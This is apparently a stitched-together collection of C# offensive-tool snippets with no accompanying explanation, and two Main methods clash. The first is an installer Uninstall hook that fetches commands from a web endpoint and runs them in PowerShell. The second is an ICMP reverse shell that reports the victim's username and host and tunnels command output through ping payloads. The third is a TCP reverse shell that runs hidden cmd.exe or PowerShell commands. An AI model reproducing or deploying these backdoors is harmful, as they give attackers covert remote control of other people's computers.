//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
WebClient w = new WebClient();
while (true)
{
try{
string r = w.DownloadString("http://127.0.0.1/rat");
string results = Pshell.RunPSCommand(r);
w.UploadString("http://127.0.0.1/rat", results);
}
catch (Exception e)
{
w.UploadString("http://127.0.0.1/rat", e.Message);
}
}
}
static void Main(string[] args)
{
if (args.Length == 0)
{
Console.WriteLine("IP is required [!]");
Environment.Exit(1);
}
string who = args[0];
int bufferSize = 128;
// Establecemos la conexion
Ping icmpClient = new Ping();
PingOptions pingOpts = new PingOptions();
pingOpts.DontFragment = true;
string connectString = ("Running as " + Environment.GetEnvironmentVariable("username") + " on " + Environment.GetEnvironmentVariable("computername"));
byte[] connectBytes = Encoding.ASCII.GetBytes(connectString);
icmpClient.Send(who, 60 * 1000, connectBytes, pingOpts);
// Muestra el CMD
string promptString = ("\nPS " + Directory.GetCurrentDirectory() + "> ");
byte[] promptBytes = Encoding.ASCII.GetBytes(promptString);
icmpClient.Send(who, 60 * 1000, promptBytes, pingOpts);
while (true)
{
string sendString = "";
byte[] sendBytes = Encoding.ASCII.GetBytes(sendString);
PingReply reply = icmpClient.Send(who, 60 * 1000, sendBytes, pingOpts);
if (reply.Buffer.Length > 0)
{
string response = Encoding.ASCII.GetString(reply.Buffer);
string result = Pshell.RunPSCommand(response);
byte[] returnBytes = Encoding.ASCII.GetBytes(result);
decimal index = Math.Floor((decimal)returnBytes.Length / bufferSize);
int i = 0;
// Divide la salida del output en pequeños buffers
if (returnBytes.Length > bufferSize)
{
while (i < index)
{
byte[] byteChunk = new byte[bufferSize];
Array.Copy(returnBytes, i * bufferSize, byteChunk, 0, bufferSize);
icmpClient.Send(who, 60 * 10000, byteChunk, pingOpts);
i++;
}
int remainingIndex = returnBytes.Length % bufferSize;
if (remainingIndex != 0)
{
byte[] byteChunk = new byte[remainingIndex];
Array.Copy(returnBytes, i * bufferSize, byteChunk, 0, remainingIndex);
icmpClient.Send(who, 60 * 10000, byteChunk, pingOpts);
}
}
else
{
icmpClient.Send(who, 60 * 10000, returnBytes, pingOpts);
}
icmpClient.Send(who, 60 * 1000, promptBytes, pingOpts);
}
else
{
Thread.Sleep(2000);
}
}
}
static void Main(string[] args)
{
try
{
if (args.Length != 2)
{
Console.WriteLine("[!] No arguments, enter a host and a port");
System.Environment.Exit(-1);
}
string server = args[0];
int port = Convert.ToInt32(args[1]);
// create client and stream
TcpClient client = new TcpClient(server, port);
NetworkStream stream = client.GetStream();
// send connection string
string connectString = ("[*] running as " + Environment.GetEnvironmentVariable("username")
+ " on " + Environment.GetEnvironmentVariable("computername")
+ "\n[+] prepend \"psh \" to use PowerShell runspace"
+ "\n[+] use \"exit\" to quit\n");
byte[] connectBytes = Encoding.ASCII.GetBytes(connectString);
stream.Write(connectBytes, 0, connectBytes.Length);
stream.Flush();
// send prompt
string promptString = ("\nshell> ");
byte[] promptBytes = Encoding.ASCII.GetBytes(promptString);
stream.Write(promptBytes, 0, promptBytes.Length);
stream.Flush();
while (true)
{
if (client.ReceiveBufferSize > 0) // either be 0 or 65536
{
// convert buffer to string, trim trailing null bytes before passing to runspace
byte[] data = new Byte[client.ReceiveBufferSize];
stream.Read(data, 0, client.ReceiveBufferSize);
string command = Encoding.ASCII.GetString(data).TrimEnd('\0');
// run command and get result, append prompt, convert to bytes and send back
// run powershell command
if (command.StartsWith("psh "))
{
command = command.Substring(4); // cut "psh "
string result = Pshell.RunPSCommand(command);
result += promptString;
byte[] returnBytes = Encoding.ASCII.GetBytes(result);
stream.Write(returnBytes, 0, returnBytes.Length);
stream.Flush();
}
// exit if asked
else if (command == "exit\n")
{
break;
}
// otherwise just use cmd (code is everywhere)
else
{
Process cmdProcess = new Process();
cmdProcess.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
cmdProcess.StartInfo.CreateNoWindow = true;
cmdProcess.StartInfo.FileName = "cmd.exe";
cmdProcess.StartInfo.Arguments = "/C " + command;
cmdProcess.StartInfo.RedirectStandardOutput = true;
cmdProcess.StartInfo.RedirectStandardError = true;
cmdProcess.StartInfo.UseShellExecute = false;
cmdProcess.Start();
string output = cmdProcess.StandardOutput.ReadToEnd()
+ cmdProcess.StandardError.ReadToEnd() + promptString;
byte[] outputBytes = Encoding.Default.GetBytes(output);
stream.Write(outputBytes, 0, outputBytes.Length);
stream.Flush();
}
}
}
client.Close();
}
catch
{
// not for prod obviously
//Console.WriteLine("[!] error!");
;
}
}